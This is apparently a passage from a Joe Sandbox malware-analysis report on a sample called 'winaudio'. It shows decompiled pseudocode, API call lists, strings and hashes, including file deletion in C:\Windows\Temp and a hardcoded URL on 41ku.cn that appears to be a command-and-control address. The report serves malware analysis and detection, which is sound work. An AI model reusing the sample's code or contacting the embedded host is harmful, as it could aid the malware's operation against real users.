				E0038123A();
				return E002E1066();
			}













                        0x002d5ea0
                        0x002d5ea3
                        0x002d5ea4
                        0x002d5ea9
                        0x002d5eab
                        0x002d5eba
                        0x002d5ec1
                        0x002d5ec4
                        0x002d5ed2
                        0x002d5ed9
                        0x002d5ede
                        0x002d5eee
                        0x002d5ef0
                        0x002d5ef0
                        0x002d5ef4
                        0x00000000
                        0x00000000
                        0x002d5ef8
                        0x002d5f08
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002d5f08
                        0x002d5ef0
                        0x002d5f0a
                        0x002d5f0f
                        0x002d5f11
                        0x002d5f13
                        0x002d5f19
                        0x002d5f19
                        0x002d5f1a
                        0x002d5f1b
                        0x003811df
                        0x003811e1
                        0x003811e6
                        0x003811ec
                        0x003811ef
                        0x003811f4
                        0x003811fc
                        0x00381201
                        0x0038120a
                        0x00381210
                        0x00381217
                        0x0038121e
                        0x00381221
                        0x00381228
                        0x00381234

                        APIs
                        • Sleep.KERNEL32(00001F40), ref: 002D5EDE
                        • EnumWindows.USER32(Function_00025DF0,?), ref: 002D5EE6
                        • Sleep.KERNEL32(00000064), ref: 002D5EF8
                        • EnumWindows.USER32(Function_00025DF0,?), ref: 002D5F00
                        • Sleep.KERNEL32(000001F4), ref: 002D5F0F
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: Sleep$EnumWindows
                        • String ID:
                        • API String ID: 3201851191-0
                        • Opcode ID: 4b4ebbf134d27c9b34fa79e5b3b6863d7a0f921f02f2340db1725fbe3293acfd
                        • Instruction ID: 7b303e515e96811718db700b62a97bb62f712d990874ecd3e0f329670a18ded0
                        • Opcode Fuzzy Hash: 4b4ebbf134d27c9b34fa79e5b3b6863d7a0f921f02f2340db1725fbe3293acfd
                        • Instruction Fuzzy Hash: CC01F9313507636BE2216B6A9C8AB6BB79CEB41F45F540127F505DB7D1CAA0CC4181A9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00395FF9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 94%
                        			E00395FF9(signed int __edx, intOrPtr _a4, intOrPtr _a8, char _a12) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				signed int _t16;
				signed int _t17;
				int _t20;
				signed int _t21;
				int _t23;
				signed int _t25;
				int _t28;
				intOrPtr* _t30;
				int _t34;
				int _t35;
				void* _t36;
				intOrPtr* _t37;
				intOrPtr* _t38;
				int _t46;
				void* _t54;
				void* _t56;
				signed int _t58;
				int _t61;
				int _t63;
				void* _t64;
				void* _t65;
				void* _t66;

				_t58 = __edx;
				_t59 = _a4;
				_t61 = 0;
				_t16 = E0038C043(_a4, 0, 0, 1);
				_v20 = _t16;
				_v16 = __edx;
				_t65 = _t64 + 0x10;
				if((_t16 & __edx) != 0xffffffff) {
					_t17 = E0038C043(_t59, 0, 0, 2);
					_t66 = _t65 + 0x10;
					_t51 = _t17 & __edx;
					__eflags = (_t17 & __edx) - 0xffffffff;
					if((_t17 & __edx) == 0xffffffff) {
						goto L1;
					}
					_t46 = _a8 - _t17;
					__eflags = _t46;
					_t5 =  &_a12; // 0x3939eb
					_t20 =  *_t5;
					asm("sbb eax, edx");
					_v8 = _t20;
					if(__eflags < 0) {
						L24:
						__eflags = _t20 - _t61;
						if(__eflags > 0) {
							L19:
							_t13 =  &_v20; // 0x3939eb
							_t21 = E0038C043(_t59,  *_t13, _v16, _t61);
							__eflags = (_t21 & _t58) - 0xffffffff;
							if((_t21 & _t58) != 0xffffffff) {
								_t23 = 0;
								__eflags = 0;
								L31:
								return _t23;
							}
							L20:
							_t23 =  *((intOrPtr*)(E00380E9E()));
							goto L31;
						}
						if(__eflags < 0) {
							L27:
							_t14 =  &_a12; // 0x3939eb
							_t25 = E0038C043(_t59, _a8,  *_t14, _t61);
							_t66 = _t66 + 0x10;
							__eflags = (_t25 & _t58) - 0xffffffff;
							if((_t25 & _t58) == 0xffffffff) {
								goto L20;
							}
							_t28 = SetEndOfFile(E00390D6C(_t59));
							__eflags = _t28;
							if(_t28 != 0) {
								goto L19;
							}
							 *((intOrPtr*)(E00380E9E())) = 0xd;
							_t30 = E00380E8B();
							 *_t30 = GetLastError();
							goto L20;
						}
						__eflags = _t46 - _t61;
						if(_t46 >= _t61) {
							goto L19;
						}
						goto L27;
					}
					if(__eflags > 0) {
						L6:
						_t63 = E0038B987(_t51, 0x1000, 1);
						_pop(_t54);
						__eflags = _t63;
						if(_t63 != 0) {
							_v12 = E00384CC0(_t54, _t59, 0x8000);
							_t34 = _v8;
							_pop(_t56);
							do {
								__eflags = _t34;
								if(__eflags < 0) {
									L13:
									_t35 = _t46;
									L14:
									_t36 = E0039247D(_t46, _t58, _t59, _t59, _t63, _t35);
									_t66 = _t66 + 0xc;
									__eflags = _t36 - 0xffffffff;
									if(_t36 == 0xffffffff) {
										_t37 = E00380E8B();
										__eflags =  *_t37 - 5;
										if( *_t37 == 5) {
											 *((intOrPtr*)(E00380E9E())) = 0xd;
										}
										L23:
										_t38 = E00380E9E();
										E0038B8FF(_t63);
										_t23 =  *_t38;
										goto L31;
									}
									asm("cdq");
									_t46 = _t46 - _t36;
									_t34 = _v8;
									asm("sbb eax, edx");
									_v8 = _t34;
									__eflags = _t34;
									if(__eflags > 0) {
										L12:
										_t35 = 0x1000;
										goto L14;
									}
									if(__eflags < 0) {
										break;
									}
									goto L17;
								}
								if(__eflags > 0) {
									goto L12;
								}
								__eflags = _t46 - 0x1000;
								if(_t46 < 0x1000) {
									goto L13;
								}
								goto L12;
								L17:
								__eflags = _t46;
							} while (_t46 != 0);
							E00384CC0(_t56, _t59, _v12);
							E0038B8FF(_t63);
							_t66 = _t66 + 0xc;
							_t61 = 0;
							__eflags = 0;
							goto L19;
						}
						 *((intOrPtr*)(E00380E9E())) = 0xc;
						goto L23;
					}
					__eflags = _t46;
					if(_t46 <= 0) {
						goto L24;
					}
					goto L6;
				}
				L1:
				return  *((intOrPtr*)(E00380E9E()));
			}































                        0x00395ff9
                        0x00396003
                        0x00396006
                        0x0039600d
                        0x00396014
                        0x00396019
                        0x0039601c
                        0x00396022
                        0x00396035
                        0x0039603c
                        0x0039603f
                        0x00396041
                        0x00396044
                        0x00000000
                        0x00000000
                        0x0039604a
                        0x0039604a
                        0x0039604c
                        0x0039604c
                        0x0039604f
                        0x00396051
                        0x00396054
                        0x00396132
                        0x00396132
                        0x00396134
                        0x003960eb
                        0x003960ef
                        0x003960f3
                        0x003960fd
                        0x00396100
                        0x00396181
                        0x00396181
                        0x00396183
                        0x00000000
                        0x00396183
                        0x00396102
                        0x00396107
                        0x00000000
                        0x00396107
                        0x00396136
                        0x0039613c
                        0x0039613d
                        0x00396144
                        0x0039614b
                        0x0039614e
                        0x00396151
                        0x00000000
                        0x00000000
                        0x0039615b
                        0x00396161
                        0x00396163
                        0x00000000
                        0x00000000
                        0x0039616a
                        0x00396170
                        0x0039617d
                        0x00000000
                        0x0039617d
                        0x00396138
                        0x0039613a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0039613a
                        0x0039605a
                        0x00396064
                        0x00396070
                        0x00396073
                        0x00396074
                        0x00396076
                        0x00396094
                        0x00396097
                        0x0039609a
                        0x0039609b
                        0x0039609b
                        0x0039609d
                        0x003960b0
                        0x003960b0
                        0x003960b2
                        0x003960b5
                        0x003960ba
                        0x003960bd
                        0x003960c0
                        0x0039610b
                        0x00396110
                        0x00396113
                        0x0039611a
                        0x0039611a
                        0x00396120
                        0x00396120
                        0x00396128
                        0x0039612e
                        0x00000000
                        0x0039612e
                        0x003960c2
                        0x003960c3
                        0x003960c5
                        0x003960c8
                        0x003960ca
                        0x003960cd
                        0x003960cf
                        0x003960a9
                        0x003960a9
                        0x00000000
                        0x003960a9
                        0x003960d1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x003960d1
                        0x0039609f
                        0x00000000
                        0x00000000
                        0x003960a1
                        0x003960a7
                        0x00000000
                        0x00000000
                        0x00000000
                        0x003960d3
                        0x003960d3
                        0x003960d3
                        0x003960db
                        0x003960e1
                        0x003960e6
                        0x003960e9
                        0x003960e9
                        0x00000000
                        0x003960e9
                        0x0039607d
                        0x00000000
                        0x0039607d
                        0x0039605c
                        0x0039605e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0039605e
                        0x00396024
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID: 99$99
                        • API String ID: 0-1363843127
                        • Opcode ID: a655e6b93ea891df364a921aaf6b168be080ce0ae6accd5d463d6bf89890b93b
                        • Instruction ID: 1f63eefdc215edf7ffff1b82f8e1c211c8216cdfad12a38eba9c25d55ce98228
                        • Opcode Fuzzy Hash: a655e6b93ea891df364a921aaf6b168be080ce0ae6accd5d463d6bf89890b93b
                        • Instruction Fuzzy Hash: 76416831A06701ABDF277BBD8C83AAF3AA9EF41370F154655F418DA392DB758D4043A1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002DA760 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 106fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 90%
                        			E002DA760(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				char _v272;
				char _v276;
				signed int _t23;
				char _t33;
				signed int _t35;
				signed int _t37;
				void* _t49;
				void* _t56;
				void* _t60;
				intOrPtr* _t61;
				signed int _t62;
				void* _t63;
				void* _t69;

				_t60 = __esi;
				_t23 =  *0x3e1008; // 0x847b54ee
				_v8 = _t23 ^ _t62;
				_t49 = 0;
				if( *0x3f097c == 0 ||  *0x3f0874 <= 0) {
					L23:
					return E002E056D(_v8 ^ _t62, _t58, _t60);
				} else {
					_t58 =  &_v276;
					_v276 = 0;
					_v272 = 0;
					if(E002DA510( &_v272,  &_v276) != 0) {
						E0037E1A0(__edi,  &_v268, 0, 0x104);
						E002D5BF0( &_v272,  &_v268, 0x104, "C:\\Windows\\Temp\\%s", "5B7C84755D8041139A7AEBA6F4E5912F.dat");
						_t63 = _t63 + 0x1c;
						DeleteFileA( &_v268);
						L6:
						_t33 = _v276;
						_push(_t60);
						_t69 = _t33 -  *0x3f0874; // 0x1b1dd
						if(_t69 != 0) {
							L19:
							_t49 = 1;
							L20:
							L00380508(_v272);
							_pop(_t60);
							if(_t49 == 0) {
								goto L23;
							}
							L21:
							_t35 =  *0x3ebbb0; // 0x6556
							_t37 =  >  ? 0 : _t35 + 2;
							 *0x3ebbb0 = _t37;
							 *0x3f0830 = _t37 & 0x00000019 | 0x000000e0;
							if(E002DA2F0() == 0) {
								GetLastError();
							}
							goto L23;
						}
						_t58 = _v272;
						_t61 =  *0x3f097c; // 0x3b69fc8
						_t56 = (0 | _t33 != 0x00000000) - 4;
						if(_t56 < 0) {
							L11:
							if(_t56 == 0xfffffffc) {
								goto L20;
							}
							L12:
							if( *_t58 !=  *_t61 || _t56 != 0xfffffffd && ( *((intOrPtr*)(_t58 + 1)) !=  *((intOrPtr*)(_t61 + 1)) || _t56 != 0xfffffffe && ( *((intOrPtr*)(_t58 + 2)) !=  *((intOrPtr*)(_t61 + 2)) || _t56 != 0xffffffff &&  *((intOrPtr*)(_t58 + 3)) !=  *((intOrPtr*)(_t61 + 3))))) {
								goto L19;
							} else {
								goto L20;
							}
						}
						while( *_t58 ==  *_t61) {
							_t58 = _t58 + 4;
							_t61 = _t61 + 4;
							_t56 = _t56 - 4;
							if(_t56 >= 0) {
								continue;
							}
							goto L11;
						}
						goto L12;
					}
					_t58 =  &_v276;
					if(E002DA3B0(0,  &_v272,  &_v276, __edi, __esi) == 0) {
						goto L21;
					}
					goto L6;
				}
			}


















                        0x002da760
                        0x002da769
                        0x002da770
                        0x002da774
                        0x002da77d
                        0x002da8cb
                        0x002da8d9
                        0x002da790
                        0x002da790
                        0x002da796
                        0x002da7a6
                        0x002da7b7
                        0x002da7e2
                        0x002da7fd
                        0x002da802
                        0x002da80c
                        0x002da812
                        0x002da812
                        0x002da818
                        0x002da819
                        0x002da81f
                        0x002da883
                        0x002da883
                        0x002da885
                        0x002da88b
                        0x002da893
                        0x002da896
                        0x00000000
                        0x00000000
                        0x002da898
                        0x002da898
                        0x002da8a7
                        0x002da8aa
                        0x002da8b7
                        0x002da8c3
                        0x002da8c5
                        0x002da8c5
                        0x00000000
                        0x002da8c3
                        0x002da821
                        0x002da829
                        0x002da834
                        0x002da837
                        0x002da851
                        0x002da854
                        0x00000000
                        0x00000000
                        0x002da856
                        0x002da85a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002da85a
                        0x002da840
                        0x002da846
                        0x002da849
                        0x002da84c
                        0x002da84f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002da84f
                        0x00000000
                        0x002da840
                        0x002da7b9
                        0x002da7cc
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002da7d2

                        APIs
                        Strings
                        • 5B7C84755D8041139A7AEBA6F4E5912F.dat, xrefs: 002DA7E7
                        • C:\Windows\Temp\%s, xrefs: 002DA7EC
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: DeleteErrorFileLast
                        • String ID: 5B7C84755D8041139A7AEBA6F4E5912F.dat$C:\Windows\Temp\%s
                        • API String ID: 2018770650-3814355176
                        • Opcode ID: 3f2b43eecb791f23049d485179713f9f759e2cdb6eab8da573430bdcd0f4cf0b
                        • Instruction ID: e0d25716695073f706cee80044958c0998524a8af87ea35b8e553eb1355988a9
                        • Opcode Fuzzy Hash: 3f2b43eecb791f23049d485179713f9f759e2cdb6eab8da573430bdcd0f4cf0b
                        • Instruction Fuzzy Hash: 934133308101098ADB2AEF34DC45BF9B7A5EB15310F4846D6E895A7391DBB09CE69F82
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002D23D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                        Download Yara Rule
                        C-Code - Quality: 75%
                        			E002D23D0(intOrPtr* __ecx) {
				intOrPtr _v8;
				char _v16;
				signed int _t22;
				intOrPtr* _t29;
				signed int _t32;
				signed int _t34;
				void* _t37;
				signed int _t42;
				signed int _t44;
				intOrPtr* _t52;
				intOrPtr* _t63;
				intOrPtr* _t65;
				signed int _t67;
				void* _t68;

				_push(0xffffffff);
				_push(0x39c416);
				_push( *[fs:0x0]);
				_t22 =  *0x3e1008; // 0x847b54ee
				_push(_t22 ^ _t67);
				 *[fs:0x0] =  &_v16;
				_t65 = __ecx;
				 *__ecx = 0x3dcec8;
				if( *((intOrPtr*)(__ecx + 0xc)) != 0) {
					_t42 =  *0x3eb514; // 0x6556
					_t44 =  >  ? 0 : _t42 + 2;
					 *0x3eb514 = _t44;
					 *0x3f0830 = _t44 & 0x00000019 | 0x000000e0;
					 *((char*)(__ecx + 0xd)) = 1;
					 *((intOrPtr*)( *__ecx + 8))();
					E002D22F0(__ecx);
				}
				E002D26A0(_t65);
				 *((intOrPtr*)(_t65 + 0x18)) = 0x3dce7c;
				 *0x39e0b4(_t65 + 0x1c);
				 *((intOrPtr*)(_t65 + 0x18)) = 0x3dce8c;
				_t29 =  *((intOrPtr*)(_t65 + 0x10));
				_t52 =  *_t29;
				 *_t29 = _t29;
				 *((intOrPtr*)( *((intOrPtr*)(_t65 + 0x10)) + 4)) =  *((intOrPtr*)(_t65 + 0x10));
				 *((intOrPtr*)(_t65 + 0x14)) = 0;
				if(_t52 !=  *((intOrPtr*)(_t65 + 0x10))) {
					do {
						_t63 =  *_t52;
						L002E05B1(_t52);
						_t68 = _t68 + 4;
						_t52 = _t63;
					} while (_t63 !=  *((intOrPtr*)(_t65 + 0x10)));
				}
				L002E05B1( *((intOrPtr*)(_t65 + 0x10)));
				_v8 = 0;
				 *_t65 = 0x3dce9c;
				if( *((char*)(_t65 + 0xc)) != 0) {
					 *((char*)(_t65 + 0xd)) = 1;
					 *((intOrPtr*)( *_t65 + 8))();
					E002D22F0(_t65);
				}
				_t32 =  *0x3eb504; // 0x6556
				_t34 =  >  ? 0 : _t32 + 2;
				 *0x3eb504 = _t34;
				 *0x3f0830 = _t34 & 0x00000019 | 0x000000e0;
				_t37 =  *(_t65 + 4);
				if(_t37 != 0) {
					_t37 = CloseHandle(_t37);
				}
				 *[fs:0x0] = _v16;
				return _t37;
			}

















                        0x002d23d3
                        0x002d23d5
                        0x002d23e0
                        0x002d23e3
                        0x002d23ea
                        0x002d23ee
                        0x002d23f4
                        0x002d23f9
                        0x002d2401
                        0x002d2403
                        0x002d2412
                        0x002d2417
                        0x002d2424
                        0x002d242b
                        0x002d242f
                        0x002d2434
                        0x002d2434
                        0x002d243b
                        0x002d2443
                        0x002d244b
                        0x002d2451
                        0x002d2458
                        0x002d245b
                        0x002d245d
                        0x002d2462
                        0x002d2465
                        0x002d246f
                        0x002d2471
                        0x002d2471
                        0x002d2474
                        0x002d2479
                        0x002d247c
                        0x002d247e
                        0x002d2471
                        0x002d2486
                        0x002d248e
                        0x002d2499
                        0x002d249f
                        0x002d24a5
                        0x002d24a9
                        0x002d24ae
                        0x002d24ae
                        0x002d24b3
                        0x002d24c2
                        0x002d24c5
                        0x002d24d2
                        0x002d24d7
                        0x002d24dc
                        0x002d24df
                        0x002d24df
                        0x002d24e8
                        0x002d24f5

                        APIs
                        • RtlDeleteCriticalSection.NTDLL(?), ref: 002D244B
                        • CloseHandle.KERNEL32(00000000), ref: 002D24DF
                          • Part of subcall function 002D22F0: Sleep.KERNEL32(0000000A,?,?,002D2188,?,?,0039C3A6,000000FF), ref: 002D2302
                          • Part of subcall function 002D22F0: CloseHandle.KERNEL32(00000000,?,002D2188,?,?,0039C3A6,000000FF), ref: 002D2317
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: CloseHandle$CriticalDeleteSectionSleep
                        • String ID: @!-$ -
                        • API String ID: 314922007-3445125451
                        • Opcode ID: b0b796b0751d26a4dd905d87d083e3466748843ae252962cfa2c259cedd824d5
                        • Instruction ID: cc982fcfcf422c4237533e045a626b2c37235ec9d82fdd317140835d633e1db4
                        • Opcode Fuzzy Hash: b0b796b0751d26a4dd905d87d083e3466748843ae252962cfa2c259cedd824d5
                        • Instruction Fuzzy Hash: 81316BB56207408FDB26CF29D85571ABBF8EB19300F04496EE89AC7791D778A844CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002E5A10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 75COMMON
                        Download Yara Rule
                        C-Code - Quality: 91%
                        			E002E5A10() {
				void* __ebx;
				void* __edi;
				void* _t6;
				intOrPtr _t12;
				void* _t14;
				char* _t15;
				char** _t18;
				void* _t20;
				void* _t21;
				void* _t22;

				E002ECF40(_t14, 5, 1, ".\\crypto\\err\\err.c", 0x248);
				_t21 = _t20 + 0x10;
				if( *0x3e1268 != 0) {
					E002ECF40(_t14, 6, 1, ".\\crypto\\err\\err.c", 0x24e);
					E002ECF40(_t14, 9, 1, ".\\crypto\\err\\err.c", 0x24f);
					_t22 = _t21 + 0x20;
					if( *0x3e1268 != 0) {
						_push(_t14);
						_t12 = 1;
						_t15 = "Operation not permitted";
						_t18 = 0x3ec234;
						do {
							 *((intOrPtr*)(_t18 - 4)) = _t12;
							if( *_t18 == 0) {
								_push(_t12);
								_t6 = E00385334(_t12, _t15);
								_t22 = _t22 + 4;
								if(_t6 != 0) {
									E00385170(_t15, _t6, 0x20);
									_t22 = _t22 + 0xc;
									_t15[0x1f] = 0;
									 *_t18 = _t15;
								}
								if( *_t18 == 0) {
									 *_t18 = "unknown";
								}
							}
							_t18 =  &(_t18[2]);
							_t12 = _t12 + 1;
							_t15 =  &(_t15[0x20]);
						} while (_t18 <= 0x3ec624);
						 *0x3e1268 = 0;
						return E002ECF40(_t15, 0xa, 1, ".\\crypto\\err\\err.c", 0x26d);
					} else {
						return E002ECF40(_t14, 0xa, 1, ".\\crypto\\err\\err.c", 0x251);
					}
				} else {
					return E002ECF40(_t14, 6, 1, ".\\crypto\\err\\err.c", 0x24a);
				}
			}













                        0x002e5a1e
                        0x002e5a23
                        0x002e5a2d
                        0x002e5a54
                        0x002e5a67
                        0x002e5a6c
                        0x002e5a76
                        0x002e5a91
                        0x002e5a92
                        0x002e5a97
                        0x002e5a9c
                        0x002e5aa1
                        0x002e5aa4
                        0x002e5aa7
                        0x002e5aa9
                        0x002e5aaa
                        0x002e5aaf
                        0x002e5ab4
                        0x002e5aba
                        0x002e5abf
                        0x002e5ac2
                        0x002e5ac6
                        0x002e5ac6
                        0x002e5acb
                        0x002e5acd
                        0x002e5acd
                        0x002e5acb
                        0x002e5ad3
                        0x002e5ad6
                        0x002e5ad7
                        0x002e5ada
                        0x002e5af0
                        0x002e5b05
                        0x002e5a78
                        0x002e5a8e
                        0x002e5a8e
                        0x002e5a2f
                        0x002e5a45
                        0x002e5a45

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID: .\crypto\err\err.c$Operation not permitted$unknown
                        • API String ID: 0-3427296222
                        • Opcode ID: ae4b41aa95d58f9765d4b85044fd54d6f804732c81061ecf3e4e0dacc92ab74c
                        • Instruction ID: b17fba32dbb628e05fae989cb636cd3a50e1cd19db0a0df78dd63fe9cf370874
                        • Opcode Fuzzy Hash: ae4b41aa95d58f9765d4b85044fd54d6f804732c81061ecf3e4e0dacc92ab74c
                        • Instruction Fuzzy Hash: 7811067DFF03517AFF227B4A9CC3F952042A711B09F940975FE586D2C2D2F628A18652
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002D8920 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                        Download Yara Rule
                        C-Code - Quality: 94%
                        			E002D8920(void* __ecx, short* __edx, void* __edi) {
				signed int _v8;
				char _v268;
				void* __esi;
				signed int _t8;
				char* _t15;
				char* _t17;
				signed int _t18;
				signed int _t20;
				short _t29;
				short* _t36;
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t40;
				void* _t41;

				_t34 = __edx;
				_t30 = __ecx;
				_t8 =  *0x3e1008; // 0x847b54ee
				_v8 = _t8 ^ _t38;
				_t36 = __edx;
				_t37 = __ecx;
				E0037E1A0(__edx,  &_v268, 0, 0x104);
				E003802FE( &_v268, 0x104, "http://41ku.cn:10100/plusxyzs");
				_t15 = E0037DD80( &_v268, 0x2f);
				_t40 = _t39 + 0x20;
				if(_t15 != 0) {
					 *_t15 = 0;
				}
				_t17 = E0037DD80( &_v268, 0x3a);
				_t41 = _t40 + 8;
				if(_t17 != 0) {
					 *_t17 = 0;
					_t29 = E00380DFB(_t30, _t17 + 1);
					_t41 = _t41 + 4;
					 *_t36 = _t29;
				}
				_t18 =  *0x3ebb98; // 0x2
				_t20 =  >  ? 0 : _t18 + 2;
				 *0x3ebb98 = _t20;
				 *0x3f0830 = _t20 & 0x00000019 | 0x000000e0;
				if(E0037DB10( &_v268, 0x3dd560) != 0 && _t37 != 0) {
					E003802FE(_t37, 0x100, _t24 + 2);
				}
				return E002E056D(_v8 ^ _t38, _t34, _t37);
			}


















                        0x002d8920
                        0x002d8920
                        0x002d8929
                        0x002d8930
                        0x002d8940
                        0x002d8945
                        0x002d8947
                        0x002d895d
                        0x002d896b
                        0x002d8970
                        0x002d8975
                        0x002d8977
                        0x002d8977
                        0x002d8983
                        0x002d8988
                        0x002d898d
                        0x002d898f
                        0x002d8994
                        0x002d8999
                        0x002d899c
                        0x002d899c
                        0x002d899f
                        0x002d89b3
                        0x002d89b6
                        0x002d89c3
                        0x002d89d9
                        0x002d89e9
                        0x002d89ee
                        0x002d8a00

                        APIs
                        Strings
                        • http://41ku.cn:10100/plusxyzs, xrefs: 002D894C
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: _strrchr$_strstr
                        • String ID: http://41ku.cn:10100/plusxyzs
                        • API String ID: 3271311268-1122138129
                        • Opcode ID: a937d75692bb806a94caa07da3dcf88d5df9957a9a15dc2815f7c46049cd82a1
                        • Instruction ID: e76691ecacfb903209d83ab46cb167408c19ea7f370349cda9753773dc4e0a06
                        • Opcode Fuzzy Hash: a937d75692bb806a94caa07da3dcf88d5df9957a9a15dc2815f7c46049cd82a1
                        • Instruction Fuzzy Hash: D721D5B1E402045AEB37EA609C43BEA73ACDF15340F4404A2F988DB381EEB4D9848795
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0038E647 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 75%
